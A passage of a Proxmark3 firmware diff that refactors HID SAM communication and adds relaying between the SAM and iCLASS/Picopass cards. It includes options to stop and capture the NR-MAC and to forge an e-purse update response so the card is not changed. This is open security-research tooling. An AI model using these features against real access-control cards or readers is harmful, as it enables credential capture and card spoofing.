+    res = sc_rx_bytes(resp + *resplen, &more_len, SIM_WAIT_DELAY);
+    if (res == false) {
+        DbpString("failed to receive from SIM CARD 2");
+        goto out;
+    }
+
+    *resplen += more_len;
+
+out:
+    return res;
+}
+
+
+static inline void swap_clock_counters(volatile unsigned int *a, unsigned int *b) {
+    unsigned int c = *a;
+    *a = *b;
+    *b = c;
+}
+
+/**
+ * @brief Swaps the timer counter values.
+ *
+ * AT91SAM7S512 has a single Timer-Counter, that is reused in clocks Ticks
+ * and CountSspClk. This function stops the current clock and restores previous
+ * values. It is used to switch between different clock sources.
+ * It probably makes communication timing off, but at least makes it work.
+ */
+static void swap_clocks(void) {
+    static unsigned int tc0, tc1, tc2 = 0;
+    StopTicks();
+    swap_clock_counters(&(AT91C_BASE_TC0->TC_CV), &tc0);
+    swap_clock_counters(&(AT91C_BASE_TC1->TC_CV), &tc1);
+    swap_clock_counters(&(AT91C_BASE_TC2->TC_CV), &tc2);
+}
+
+void switch_clock_to_ticks(void) {
+    swap_clocks();
+    StartTicks();
+}
+
+void switch_clock_to_countsspclk(void) {
+    swap_clocks();
+    StartCountSspClk();
+}
+
+
+/**
+ * @brief Sends a payload to the SAM
+ *
+ * This function prepends the payload with the necessary APDU and application
+ * headers and sends it to the SAM.
+ *
+ * @param addr_src 0x14 for command from NFC, 0x44 for command from application
+ * @param addr_dest 0x0A for command to SAM
+ * @param addr_reply same as add_src or 0x00 if no reply is expected
+ * @param payload Pointer to the data to be sent.
+ * @param payload_len Length of the data to be sent.
+ * @param response Pointer to the buffer where the response will be stored.
+ * @param response_len Pointer to the variable where the length of the response will be stored.
+ * @param length Length of the data to be sent.
+ * @return Status code indicating success or failure of the operation.
+ */
+int sam_send_payload(
+    const uint8_t addr_src,
+    const uint8_t addr_dest,
+    const uint8_t addr_reply,
+
+    const uint8_t *const payload,
+    const uint16_t *payload_len,
+
+    uint8_t *response,
+    uint16_t *response_len
+) {
+    int res = PM3_SUCCESS;
+
+    uint8_t *buf = response;
+
+    buf[0] = 0xA0; // CLA
+    buf[1] = 0xDA; // INS (PUT DATA)
+    buf[2] = 0x02; // P1 (TLV format?)
+    buf[3] = 0x63; // P2
+    buf[4] = SAM_TX_ASN1_PREFIX_LENGTH + (uint8_t) * payload_len; // LEN
+
+    buf[5] = addr_src;
+    buf[6] = addr_dest;
+    buf[7] = addr_reply;
+
+    buf[8] = 0x00;
+    buf[9] = 0x00;
+    buf[10] = 0x00;
+
+    memcpy(
+        &buf[11],
+        payload,
+        *payload_len
+    );
+
+    uint16_t length = SAM_TX_ASN1_PREFIX_LENGTH + SAM_TX_APDU_PREFIX_LENGTH + (uint8_t) * payload_len;
+
+    LogTrace(buf, length, 0, 0, NULL, true);
+    if (g_dbglevel >= DBG_INFO) {
+        DbpString("SAM REQUEST APDU: ");
+        Dbhexdump(length, buf, false);
+    }
+
+    if (sam_rxtx(buf, length, response, response_len) == false) {
+        if (g_dbglevel >= DBG_ERROR)
+            DbpString("SAM ERROR");
+        res = PM3_ECARDEXCHANGE;
+        goto out;
+    }
+
+    LogTrace(response, *response_len, 0, 0, NULL, false);
+    if (g_dbglevel >= DBG_INFO) {
+        DbpString("SAM RESPONSE APDU: ");
+        Dbhexdump(*response_len, response, false);
+    }
+
+out:
+    return res;
+}
+
+
+/**
+ * @brief Retreives SAM firmware version.
+ *
+ * Used just as ping or sanity check here.
+ *
+ * @return Status code indicating success or failure of the operation.
+ */
+int sam_get_version(bool info) {
+    int res = PM3_SUCCESS;
+
+    if (g_dbglevel >= DBG_DEBUG) {
+        DbpString("start sam_get_version");
+    }
+
+    uint8_t *response = BigBuf_calloc(ISO7816_MAX_FRAME);
+    uint16_t response_len = ISO7816_MAX_FRAME;
+
+    uint8_t payload[] = {
+        0xa0, // <- SAM command
+        0x02, // <- Length
+        0x82, 0x00 // <- get version
+    };
+    uint16_t payload_len = sizeof(payload);
+
+    sam_send_payload(
+        0x44, 0x0a, 0x44,
+        payload,
+        &payload_len,
+        response,
+        &response_len
+    );
+
+    // resp:
+    // c1 64 00 00 00
+    //    bd 11 <- SAM response
+    //     8a 0f <- get version response
+    //      80 02
+    //       01 29 <- version
+    //      81 06
+    //       68 3d 05 20 26 b6 <- build ID
+    //      82 01
+    //       01
+    // 90 00
+    if (g_dbglevel >= DBG_DEBUG) {
+        DbpString("end sam_get_version");
+    }
+
+    if (response[5] != 0xbd) {
+        Dbprintf("Invalid SAM response");
+        goto error;
+    } else {
+        uint8_t *sam_response_an = sam_find_asn1_node(response + 5, 0x8a);
+        if (sam_response_an == NULL) {
+            if (g_dbglevel >= DBG_ERROR) DbpString("SAM get response failed");
+            goto error;
+        }
+        uint8_t *sam_version_an = sam_find_asn1_node(sam_response_an, 0x80);
+        if (sam_version_an == NULL) {
+            if (g_dbglevel >= DBG_ERROR) DbpString(_RED_("SAM: get version failed"));
+            goto error;
+        }
+        uint8_t *sam_build_an = sam_find_asn1_node(sam_response_an, 0x81);
+        if (sam_build_an == NULL) {
+            if (g_dbglevel >= DBG_ERROR) DbpString(_RED_("SAM: get firmware ID failed"));
+            goto error;
+        }
+        if (g_dbglevel >= DBG_INFO || info) {
+            DbpString(_BLUE_("-- SAM Information --"));
+            Dbprintf(_YELLOW_("Firmware version: ")"%d.%d", sam_version_an[2], sam_version_an[3]);
+            Dbprintf(_YELLOW_("Firmware ID: "));
+            Dbhexdump(sam_build_an[1], sam_build_an + 2, false);
+        }
+        goto out;
+    }
+
+error:
+    res = PM3_ESOFT;
+
+out:
+    BigBuf_free();
+
+    if (g_dbglevel >= DBG_DEBUG) {
+        DbpString("end sam_get_version");
+    }
+
+    return res;
+}
+
+int sam_get_serial_number(void) {
+    int res = PM3_SUCCESS;
+
+    if (g_dbglevel >= DBG_DEBUG) {
+        DbpString("start sam_get_serial_number");
+    }
+
+    uint8_t *response = BigBuf_calloc(ISO7816_MAX_FRAME);
+    uint16_t response_len = ISO7816_MAX_FRAME;
+
+    uint8_t payload[] = {
+        0xa0, // <- SAM command
+        0x02, // <- Length
+        0x96, 0x00 // <- get serial number
+    };
+    uint16_t payload_len = sizeof(payload);
+
+    sam_send_payload(
+        0x44, 0x0a, 0x44,
+        payload,
+        &payload_len,
+        response,
+        &response_len
+    );
+
+    //resp:
+    //c1 64 00 00 00
+    //   bd 0e <- SAM response
+    //    8a 0c <- get serial number response
+    //      61 01 13 51 22 66 6e 15 3e 1b ff ff
+    //90 00
+
+    if (g_dbglevel >= DBG_DEBUG) {
+        DbpString("end sam_get_serial_number");
+    }
+
+    if (response[5] != 0xbd) {
+        Dbprintf("Invalid SAM response");
+        goto error;
+    } else {
+        uint8_t *sam_response_an = sam_find_asn1_node(response + 5, 0x8a);
+        if (sam_response_an == NULL) {
+            if (g_dbglevel >= DBG_ERROR) DbpString(_RED_("SAM: get response failed"));
+            goto error;
+        }
+        uint8_t *sam_serial_an = sam_response_an + 2;
+        if (sam_serial_an == NULL) {
+            if (g_dbglevel >= DBG_ERROR) DbpString(_RED_("SAM get serial number failed"));
+            goto error;
+        }
+
+        Dbprintf(_YELLOW_("Serial Number: "));
+        Dbhexdump(sam_response_an[1], sam_serial_an, false);
+
+        goto out;
+    }
+
+error:
+    res = PM3_ESOFT;
+
+out:
+    BigBuf_free();
+
+    if (g_dbglevel >= DBG_DEBUG) {
+        DbpString("end sam_get_serial_number");
+    }
+
+    return res;
+}
+
+
+
+/**
+ * @brief Finds an ASN.1 node of a specified type within a given root node.
+ *
+ * This function searches through a single level of  the ASN.1 structure starting
+ * from the root node to find a node of the specified type.
+ *
+ * @param root Pointer to the root node of the ASN.1 structure.
+ * @param type The type of the ASN.1 node to find.
+ * @return Pointer to the ASN.1 node of the specified type if found, otherwise NULL.
+ */
+uint8_t *sam_find_asn1_node(const uint8_t *root, const uint8_t type) {
+    const uint8_t *end = (uint8_t *) root + *(root + 1);
+    uint8_t *current = (uint8_t *) root + 2;
+    while (current < end) {
+        if (*current == type) {
+            return current;
+        } else {
+            current += 2 + *(current + 1);
+        }
+    }
+    return NULL;
+}
+
+/**
+ * @brief Appends an ASN.1 node to the end of a given node.
+ *
+ * This function appends an ASN.1 node of a specified type and length to the end of
+ * the ASN.1 structure at specified node level.
+ *
+ * It is the most naive solution that does not handle the case where the node to append is
+ * not the last node at the same level. It also does not also care about proper
+ * order of the nodes.
+ *
+ * @param root Pointer to the root node of the ASN.1 structure.
+ * @param root Pointer to the node to be appended of the ASN.1 structure.
+ * @param type The type of the ASN.1 node to append.
+ * @param data Pointer to the data to be appended.
+ * @param len The length of the data to be appended.
+ */
+void sam_append_asn1_node(const uint8_t *root, const uint8_t *node, uint8_t type, const uint8_t *const data, uint8_t len) {
+    uint8_t *end = (uint8_t *) root + *(root + 1) + 2;
+
+    *(end) = type;
+    *(end + 1) = len;
+    memcpy(end + 2, data, len);
+
+    for (uint8_t *current = (uint8_t *) root; current <= node; current += 2) {
+        *(current + 1) += 2 + len;
+    };
+    return;
+}
+
+void sam_send_ack(void) {
+    uint8_t *response = BigBuf_calloc(ISO7816_MAX_FRAME);
+    uint16_t response_len = ISO7816_MAX_FRAME;
+
+    uint8_t payload[] = { 0xa0, 0 };
+    uint16_t payload_len = sizeof(payload);
+
+    sam_send_payload(
+        0x44, 0x0a, 0x00,
+        payload,
+        &payload_len,
+        response,
+        &response_len
+    );
+
+    BigBuf_free();
+}
+
+/**
+ * @brief Copies the payload from an NFC buffer to a SAM buffer.
+ *
+ * Wraps received data from NFC into an ASN1 tree, so it can be transmitted to the SAM .
+ *
+ * @param sam_tx Pointer to the SAM transmit buffer.
+ * @param nfc_rx Pointer to the NFC receive buffer.
+ * @param nfc_len Length of the data to be copied from the NFC buffer.
+ *
+ * @return Length of SAM APDU to be sent.
+ */
+uint16_t sam_copy_payload_nfc2sam(uint8_t *sam_tx, uint8_t *nfc_rx, uint8_t nfc_len) {
+    // NFC resp:
+    // 6f 0c 84 0a a0 00 00 04 40 00 01 01 00 01 90 00 fb e3
+
+    // SAM req:
+    // bd 1c
+    //    a0 1a
+    //       a0 18
+    //          80 12
+    //             6f 0c 84 0a a0 00 00 04 40 00 01 01 00 01 90 00 fb e3
+    //          81 02
+    //             00 00
+
+    const uint8_t payload[] = {
+        0xbd, 4,
+        0xa0, 2,
+        0xa0, 0
+    };
+
+    const uint8_t tag81[] = {
+        0x00, 0x00
+    };
+
+    memcpy(sam_tx, payload, sizeof(payload));
+
+    sam_append_asn1_node(sam_tx, sam_tx + 4, 0x80, nfc_rx, nfc_len);
+    sam_append_asn1_node(sam_tx, sam_tx + 4, 0x81, tag81, sizeof(tag81));
+
+    return sam_tx[1] + 2; // length of the ASN1 tree
+}
+
+/**
+ * @brief Copies the payload from the SAM receive buffer to the NFC transmit buffer.
+ *
+ * Unpacks data to be transmitted from ASN1 tree in APDU received from SAM.
+ *
+ * @param nfc_tx_buf Pointer to the buffer where the NFC transmit data will be stored.
+ * @param sam_rx_buf Pointer to the buffer containing the data received from the SAM.
+ * @return Length of NFC APDU to be sent.
+ */
+uint16_t sam_copy_payload_sam2nfc(uint8_t *nfc_tx_buf, uint8_t *sam_rx_buf) {
+    // SAM resp:
+    // c1 61 c1 00 00
+    //  a1 10 <- nfc command
+    //    a1 0e <- nfc send
+    //       80 10 <- data
+    //          00 a4 04 00 0a a0 00 00 04 40 00 01 01 00 01 00
+    //       81 02 <- protocol
+    //          00 04
+    //       82 02 <- timeout
+    //          01 F4
+    //  90 00
+
+    // NFC req:
+    // 0C  05  DE  64
+
+    // copy data out of c1->a1>->a1->80 node
+    uint16_t nfc_tx_len = (uint8_t) * (sam_rx_buf + 10);
+    memcpy(nfc_tx_buf, sam_rx_buf + 11, nfc_tx_len);
+    return nfc_tx_len;
+}

armsrc/sam_common.h

@@ -0,0 +1,53 @@
+//-----------------------------------------------------------------------------
+// Copyright (C) Proxmark3 contributors. See AUTHORS.md for details.
+//
+// This program is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// This program is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+//
+// See LICENSE.txt for the text of the license.
+//-----------------------------------------------------------------------------
+#ifndef __SAM_COMMON_H
+#define __SAM_COMMON_H
+
+#include "common.h"
+
+static const uint8_t SAM_TX_APDU_PREFIX_LENGTH = 5;
+static const uint8_t SAM_TX_ASN1_PREFIX_LENGTH = 6;
+static const uint8_t SAM_RX_ASN1_PREFIX_LENGTH = 5;
+
+int sam_rxtx(const uint8_t *data, uint16_t n, uint8_t *resp, uint16_t *resplen);
+
+void switch_clock_to_ticks(void);
+void switch_clock_to_countsspclk(void);
+
+int sam_send_payload(
+    const uint8_t addr_src,
+    const uint8_t addr_dest,
+    const uint8_t addr_reply,
+
+    const uint8_t *const payload,
+    const uint16_t *payload_len,
+
+    uint8_t *response,
+    uint16_t *response_len
+);
+
+int sam_get_version(bool info);
+int sam_get_serial_number(void);
+
+uint8_t *sam_find_asn1_node(const uint8_t *root, const uint8_t type);
+void sam_append_asn1_node(const uint8_t *root, const uint8_t *node, uint8_t type, const uint8_t *const data, uint8_t len);
+
+void sam_send_ack(void);
+
+uint16_t sam_copy_payload_nfc2sam(uint8_t *sam_tx, uint8_t *nfc_rx, uint8_t nfc_len);
+uint16_t sam_copy_payload_sam2nfc(uint8_t *nfc_tx_buf, uint8_t *sam_rx_buf);
+
+#endif

armsrc/sam_mfc.c

@@ -16,7 +16,7 @@
 // Routines to support MFC <-> SAM communication
 //-----------------------------------------------------------------------------
 #include "sam_mfc.h"
-#include "sam_seos.h"
+#include "sam_common.h"
 #include "iclass.h"
 
 #include "proxmark3_arm.h"

armsrc/sam_mfc.h

@@ -17,5 +17,6 @@
 #define __SAM_MFC_H
 
 #include "common.h"
+#include "sam_common.h"
 
 #endif

armsrc/sam_picopass.c

@@ -16,6 +16,7 @@
 // Routines to support Picopass <-> SAM communication
 //-----------------------------------------------------------------------------
 #include "sam_picopass.h"
+#include "sam_common.h"
 #include "iclass.h"
 #include "crc16.h"
 #include "proxmark3_arm.h"
@@ -29,419 +30,393 @@
 #include "protocols.h"
 #include "optimized_cipher.h"
 #include "fpgaloader.h"
+#include "pm3_cmd.h"
 
-static int sam_rxtx(const uint8_t *data, uint16_t n, uint8_t *resp, uint16_t *resplen) {
+/**
+ * @brief Sends a request to the SAM and retrieves the response.
+ *
+ * Unpacks request to the SAM and relays ISO15 traffic to the card.
+ * If no request data provided, sends a request to get PACS data.
+ *
+ * @param request Pointer to the buffer containing the request to be sent to the SAM.
+ * @param request_len Length of the request to be sent to the SAM.
+ * @param response Pointer to the buffer where the retreived data will be stored.
+ * @param response_len Pointer to the variable where the length of the retreived data will be stored.
+ * @return Status code indicating success or failure of the operation.
+ */
+static int sam_send_request_iso15(const uint8_t *const request, const uint8_t request_len, uint8_t *response, uint8_t *response_len, const bool shallow_mod, const bool break_on_nr_mac, const bool prevent_epurse_update) {
+    int res = PM3_SUCCESS;
+    if (g_dbglevel >= DBG_DEBUG) {
+        DbpString("start sam_send_request_iso14a");
+    }
 
-    StartTicks();
-
-    bool res = I2C_BufferWrite(data, n, I2C_DEVICE_CMD_SEND_T0, I2C_DEVICE_ADDRESS_MAIN);
-    if (res == false) {
-        DbpString("failed to send to SIM CARD");
+    uint8_t *buf1 = BigBuf_calloc(ISO7816_MAX_FRAME);
+    uint8_t *buf2 = BigBuf_calloc(ISO7816_MAX_FRAME);
+    if (buf1 == NULL || buf2 == NULL) {
+        res = PM3_EMALLOC;
         goto out;
     }
 
-    *resplen = ISO7816_MAX_FRAME;
+    uint8_t *sam_tx_buf = buf1;
+    uint16_t sam_tx_len;
 
-    res = sc_rx_bytes(resp, resplen, SIM_WAIT_DELAY);
-    if (res == false) {
-        DbpString("failed to receive from SIM CARD");
-        goto out;
-    }
+    uint8_t *sam_rx_buf = buf2;
+    uint16_t sam_rx_len;
 
-    if (*resplen < 2) {
-        DbpString("received too few bytes from SIM CARD");
-        res = false;
-        goto out;
-    }
+    uint8_t *nfc_tx_buf = buf1;
+    uint16_t nfc_tx_len;
 
-    uint16_t more_len = 0;
+    uint8_t *nfc_rx_buf = buf2;
+    uint16_t nfc_rx_len;
 
-    if (resp[*resplen - 2] == 0x61 || resp[*resplen - 2] == 0x9F) {
-        more_len = resp[*resplen - 1];
+    if (request_len > 0) {
+        sam_tx_len = request_len;
+        memcpy(sam_tx_buf, request, sam_tx_len);
     } else {
-        // we done, return
-        goto out;
+        // send get pacs
+        static const uint8_t payload[] = {
+            0xa0, 19, // <- SAM command
+            0xBE, 17, // <- samCommandGetContentElement2
+            0x80, 1,
+            0x04, // <- implicitFormatPhysicalAccessBits
+            0x84, 12,
+            0x2B, 0x06, 0x01, 0x04, 0x01, 0x81, 0xE4, 0x38, 0x01, 0x01, 0x02, 0x04 // <- SoRootOID
+        };
+
+        sam_tx_len = sizeof(payload);
+        memcpy(sam_tx_buf, payload, sam_tx_len);
     }
 
-    // Don't discard data we already received except the SW code.
-    // If we only received 1 byte, this is the echo of INS, we discard it.
-    *resplen -= 2;
-    if (*resplen == 1) {
-        *resplen = 0;
+    sam_send_payload(
+        0x44, 0x0a, 0x44,
+        sam_tx_buf, &sam_tx_len,
+        sam_rx_buf, &sam_rx_len
+    );
+
+    if (sam_rx_buf[1] == 0x61) { // commands to be relayed to card starts with 0x61
+        switch_clock_to_countsspclk();
+        // tag <-> SAM exchange starts here
+
+        while (sam_rx_buf[1] == 0x61) {
+            uint32_t start_time = GetCountSspClk();
+            uint32_t eof_time = start_time + DELAY_ICLASS_VICC_TO_VCD_READER;
+
+            nfc_tx_len = sam_copy_payload_sam2nfc(nfc_tx_buf, sam_rx_buf);
+
+            bool is_cmd_check = ((nfc_tx_buf[0] & 0x0F) == ICLASS_CMD_CHECK);
+
+            if (is_cmd_check && break_on_nr_mac) {
+
+                memcpy(response, nfc_tx_buf, nfc_tx_len);
+                *response_len = nfc_tx_len;
+
+                if (g_dbglevel >= DBG_INFO) {
+                    DbpString("NR-MAC: ");
+                    Dbhexdump((*response_len) - 1, response + 1, false);
+                }
+                res = PM3_SUCCESS;
+                goto out;
+            }
+
+            bool is_cmd_update = ((nfc_tx_buf[0] & 0x0F) == ICLASS_CMD_UPDATE);
+
+            if (is_cmd_update && prevent_epurse_update && nfc_tx_buf[0] == 0x87 && nfc_tx_buf[1] == 0x02) {
+                // block update(2) command and fake the response to prevent update of epurse
+
+                // NFC TX BUFFERS PREPARED BY SAM LOOKS LIKE:
+                // 87 02 #1(C9 FD FF FF) #2(FF FF FF FF) F4 BF 98 E2
+
+                // NFC RX BUFFERS EXPECTED BY SAM WOULD LOOK LIKE:
+                // #2(FF FF FF FF) #1(C9 FD FF FF) 3A 47
+
+                memcpy(nfc_rx_buf + 0, nfc_tx_buf + 6, 4);
+                memcpy(nfc_rx_buf + 4, nfc_tx_buf + 0, 4);
+                AddCrc(nfc_rx_buf, 8);
+                nfc_rx_len = 10;
+
+                if (g_dbglevel >= DBG_INFO) {
+                    DbpString("FAKE EPURSE UPDATE RESPONSE: ");
+                    Dbhexdump(nfc_rx_len, nfc_rx_buf, false);
+                }
+
+            } else {
+                if (g_dbglevel >= DBG_INFO) {
+                    DbpString("ISO15 TAG REQUEST: ");
+                    Dbhexdump(nfc_tx_len, nfc_tx_buf, false);
+                }
+
+                int tries = 3;
+                nfc_rx_len = 0;
+                while (tries-- > 0) {
+                    iclass_send_as_reader(nfc_tx_buf, nfc_tx_len, &start_time, &eof_time, shallow_mod);
+                    uint16_t timeout = is_cmd_update ? ICLASS_READER_TIMEOUT_UPDATE : ICLASS_READER_TIMEOUT_ACTALL;
+
+                    res = GetIso15693AnswerFromTag(nfc_rx_buf, ISO7816_MAX_FRAME, timeout, &eof_time, false, true, &nfc_rx_len);
+                    if (res == PM3_SUCCESS && nfc_rx_len > 0) {
+                        break;
+                    }
+
+                    start_time = eof_time + ((DELAY_ICLASS_VICC_TO_VCD_READER + DELAY_ISO15693_VCD_TO_VICC_READER + (8 * 8 * 8 * 16)) * 2);
+                }
+
+
+                if (res != PM3_SUCCESS) {
+                    res = PM3_ECARDEXCHANGE;
+                    goto out;
+                }
+
+                if (g_dbglevel >= DBG_INFO) {
+                    DbpString("ISO15 TAG RESPONSE: ");
+                    Dbhexdump(nfc_rx_len, nfc_rx_buf, false);
+                }
+            }
+
+
+            switch_clock_to_ticks();
+            sam_tx_len = sam_copy_payload_nfc2sam(sam_tx_buf, nfc_rx_buf, nfc_rx_len);
+
+            sam_send_payload(
+                0x14, 0x0a, 0x14,
+                sam_tx_buf, &sam_tx_len,
+                sam_rx_buf, &sam_rx_len
+            );
+
+            // last SAM->TAG
+            // c1 61 c1 00 00 a1 02 >>82<< 00 90 00
+            if (sam_rx_buf[7] == 0x82) {
+                // tag <-> SAM exchange ends here
+                break;
+            }
+
+            switch_clock_to_countsspclk();
+
+        }
+
+        static const uint8_t hfack[] = {
+            0xbd, 0x04, 0xa0, 0x02, 0x82, 0x00
+        };
+
+        sam_tx_len = sizeof(hfack);
+        memcpy(sam_tx_buf, hfack, sam_tx_len);
+
+        sam_send_payload(
+            0x14, 0x0a, 0x00,
+            sam_tx_buf, &sam_tx_len,
+            sam_rx_buf, &sam_rx_len
+        );
     }
 
-    uint8_t cmd_getresp[] = {0x00, ISO7816_GET_RESPONSE, 0x00, 0x00, more_len};
+    // resp for SamCommandGetContentElement:
+    // c1 64 00 00 00
+    // bd 09
+    //    8a 07
+    //        03 05 <- include tag for pm3 client
+    //           06 85 80 6d c0 <- decoded PACS data
+    // 90 00
 
-    res = I2C_BufferWrite(cmd_getresp, sizeof(cmd_getresp), I2C_DEVICE_CMD_SEND_T0, I2C_DEVICE_ADDRESS_MAIN);
-    if (res == false) {
-        DbpString("failed to send to SIM CARD 2");
-        goto out;
+    // resp for samCommandGetContentElement2:
+    // c1 64 00 00 00
+    // bd 1e
+    //    b3 1c
+    //       a0 1a
+    //          80 05
+    //             06 85 80 6d c0
+    //           81 0e
+    //              2b 06 01 04 01 81 e4 38 01 01 02 04 3c ff
+    //           82 01
+    //              07
+    // 90 00
+    if (request_len == 0) {
+
+        if (!(sam_rx_buf[5] == 0xbd && sam_rx_buf[5 + 2] == 0x8a && sam_rx_buf[5 + 4] == 0x03) &&
+                !(sam_rx_buf[5] == 0xbd && sam_rx_buf[5 + 2] == 0xb3 && sam_rx_buf[5 + 4] == 0xa0)) {
+
+            if (g_dbglevel >= DBG_ERROR) {
+                Dbprintf("No PACS data in SAM response");
+            }
+            res = PM3_ESOFT;
+        }
     }
 
-    more_len = 255 - *resplen;
-
-    res = sc_rx_bytes(resp + *resplen, &more_len, SIM_WAIT_DELAY);
-    if (res == false) {
-        DbpString("failed to receive from SIM CARD 2");
-        goto out;
+    if (sam_rx_buf[6] == 0x81 && sam_rx_buf[8] == 0x8a && sam_rx_buf[9] == 0x81) { //check if the response is an SNMP message
+        *response_len = sam_rx_buf[5 + 2] + 3;
+    } else { //if not, use the old logic
+        *response_len = sam_rx_buf[5 + 1] + 2;
     }
 
-    *resplen += more_len;
+    if (sam_rx_buf[5] == 0xBD && sam_rx_buf[4] != 0x00) { //secure channel flag is not 0x00
+        Dbprintf(_YELLOW_("Secure channel flag set to: ")"%02x", sam_rx_buf[4]);
+    }
+
+    memcpy(response, sam_rx_buf + 5, *response_len);
+
+    goto out;
 
 out:
-    StopTicks();
-    return res;
-}
-
-// using HID SAM to authenticate w PICOPASS
-int sam_picopass_get_pacs(void) {
-
-    static uint8_t act_all[] = { ICLASS_CMD_ACTALL };
-    static uint8_t identify[] = { ICLASS_CMD_READ_OR_IDENTIFY, 0x00, 0x73, 0x33 };
-    static uint8_t read_conf[] = { ICLASS_CMD_READ_OR_IDENTIFY, 0x01, 0xfa, 0x22 };
-    uint8_t select[] = { 0x80 | ICLASS_CMD_SELECT, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
-    uint8_t read_aia[] = { ICLASS_CMD_READ_OR_IDENTIFY, 0x05, 0xde, 0x64};
-    uint8_t read_check_cc[] = { 0x80 | ICLASS_CMD_READCHECK, 0x02 };
-
-    picopass_hdr_t hdr = {0};
-    // Bit 4: K.If this bit equals to one, the READCHECK will use the Credit Key (Kc); if equals to zero, Debit Key (Kd) will be used
-    // bit 7: parity.
-    // if (use_credit_key)
-    //     read_check_cc[0] = 0x10 | ICLASS_CMD_READCHECK;
-
-    BigBuf_free_keep_EM();
-
-    clear_trace();
-
-    I2C_Reset_EnterMainProgram();
-    StopTicks();
-
-    uint8_t *resp = BigBuf_calloc(ISO7816_MAX_FRAME);
-
-    bool shallow_mod = false;
-    uint16_t resp_len = 0;
-    int res;
-    uint32_t eof_time = 0;
-
-    // wakeup
-    Iso15693InitReader();
-
-    uint32_t start_time = GetCountSspClk();
-    iclass_send_as_reader(act_all, 1, &start_time, &eof_time, shallow_mod);
-
-    res = GetIso15693AnswerFromTag(resp, ISO7816_MAX_FRAME, ICLASS_READER_TIMEOUT_ACTALL, &eof_time, false, true, &resp_len);
-    if (res != PM3_SUCCESS) {
-        res = PM3_ECARDEXCHANGE;
-        goto out;
-    }
-
-    // send Identify
-    start_time = eof_time + DELAY_ICLASS_VICC_TO_VCD_READER;
-    iclass_send_as_reader(identify, 1, &start_time, &eof_time, shallow_mod);
-
-    // expect a 10-byte response here, 8 byte anticollision-CSN and 2 byte CRC
-    res = GetIso15693AnswerFromTag(resp, ISO7816_MAX_FRAME, ICLASS_READER_TIMEOUT_OTHERS, &eof_time, false, true, &resp_len);
-    if (res != PM3_SUCCESS || resp_len != 10) {
-        res = PM3_ECARDEXCHANGE;
-        goto out;
-    }
-
-    // copy the Anti-collision CSN to our select-packet
-    memcpy(&select[1], resp, 8);
-
-    // select the card
-    start_time = eof_time + DELAY_ICLASS_VICC_TO_VCD_READER;
-    iclass_send_as_reader(select, sizeof(select), &start_time, &eof_time, shallow_mod);
-
-    // expect a 10-byte response here, 8 byte CSN and 2 byte CRC
-    res = GetIso15693AnswerFromTag(resp, ISO7816_MAX_FRAME, ICLASS_READER_TIMEOUT_OTHERS, &eof_time, false, true, &resp_len);
-    if (res != PM3_SUCCESS || resp_len != 10) {
-        res = PM3_ECARDEXCHANGE;
-        goto out;
-    }
-
-    // store CSN
-    memcpy(hdr.csn, resp, sizeof(hdr.csn));
-
-    // card selected, now read config (block1) (only 8 bytes no CRC)
-    start_time = eof_time + DELAY_ICLASS_VICC_TO_VCD_READER;
-    iclass_send_as_reader(read_conf, sizeof(read_conf), &start_time, &eof_time, shallow_mod);
-
-    // expect a 8-byte response here
-    res = GetIso15693AnswerFromTag(resp, ISO7816_MAX_FRAME, ICLASS_READER_TIMEOUT_OTHERS, &eof_time, false, true, &resp_len);
-    if (res != PM3_SUCCESS || resp_len != 10) {
-        res = PM3_ECARDEXCHANGE;
-        goto out;
-    }
-
-    // store CONFIG
-    memcpy((uint8_t *)&hdr.conf, resp, sizeof(hdr.conf));
-
-    uint8_t pagemap = get_pagemap(&hdr);
-    if (pagemap == PICOPASS_NON_SECURE_PAGEMODE) {
-        res = PM3_EWRONGANSWER;
-        goto out;
-    }
-
-    // read App Issuer Area block 5
-    start_time = eof_time + DELAY_ICLASS_VICC_TO_VCD_READER;
-    iclass_send_as_reader(read_aia, sizeof(read_aia), &start_time, &eof_time, shallow_mod);
-
-    // expect a 10-byte response here
-    res = GetIso15693AnswerFromTag(resp, ISO7816_MAX_FRAME, ICLASS_READER_TIMEOUT_OTHERS, &eof_time, false, true, &resp_len);
-    if (res != PM3_SUCCESS || resp_len != 10) {
-        res = PM3_ECARDEXCHANGE;
-        goto out;
-    }
-
-    // store AIA
-    memcpy(hdr.app_issuer_area, resp, sizeof(hdr.app_issuer_area));
-
-    // card selected, now read e-purse (cc) (block2) (only 8 bytes no CRC)
-    start_time = eof_time + DELAY_ICLASS_VICC_TO_VCD_READER;
-    iclass_send_as_reader(read_check_cc, sizeof(read_check_cc), &start_time, &eof_time, shallow_mod);
-
-    // expect a 8-byte response here
-    res = GetIso15693AnswerFromTag(resp, ISO7816_MAX_FRAME, ICLASS_READER_TIMEOUT_OTHERS, &eof_time, false, true, &resp_len);
-    if (res != PM3_SUCCESS || resp_len != 8) {
-        res = PM3_ECARDEXCHANGE;
-        goto out;
-    }
-
-    // store EPURSE
-    memcpy(hdr.epurse, resp, sizeof(hdr.epurse));
-
-    // -----------------------------------------------------------------------------
-    // SAM comms
-    // -----------------------------------------------------------------------------
-    size_t sam_len = 0;
-    uint8_t *sam_apdu = BigBuf_calloc(ISO7816_MAX_FRAME);
-
-    // -----------------------------------------------------------------------------
-    // first
-    // a0 da 02 63 1a 44 0a 44 00 00 00 a0 12 ad 10 a0 0e 80 02 00 04 81 08 9b fc a4 00 fb ff 12 e0
-    hexstr_to_byte_array("a0da02631a440a44000000a012ad10a00e800200048108", sam_apdu, &sam_len);
-    memcpy(sam_apdu + sam_len, hdr.csn, sizeof(hdr.csn));
-    sam_len += sizeof(hdr.csn);
-
-    if (sam_rxtx(sam_apdu, sam_len, resp, &resp_len) == false) {
-        res = PM3_ECARDEXCHANGE;
-        goto out;
-    }
-    print_dbg("-- 1", resp, resp_len);
-
-    // -----------------------------------------------------------------------------
-    // second
-    // a0 da 02 63 0d 44 0a 44 00 00 00 a0 05 a1 03 80 01 04
-    hexstr_to_byte_array("a0da02630d440a44000000a005a103800104", sam_apdu, &sam_len);
-    if (sam_rxtx(sam_apdu, sam_len, resp, &resp_len) == false) {
-        res = PM3_ECARDEXCHANGE;
-        goto out;
-    }
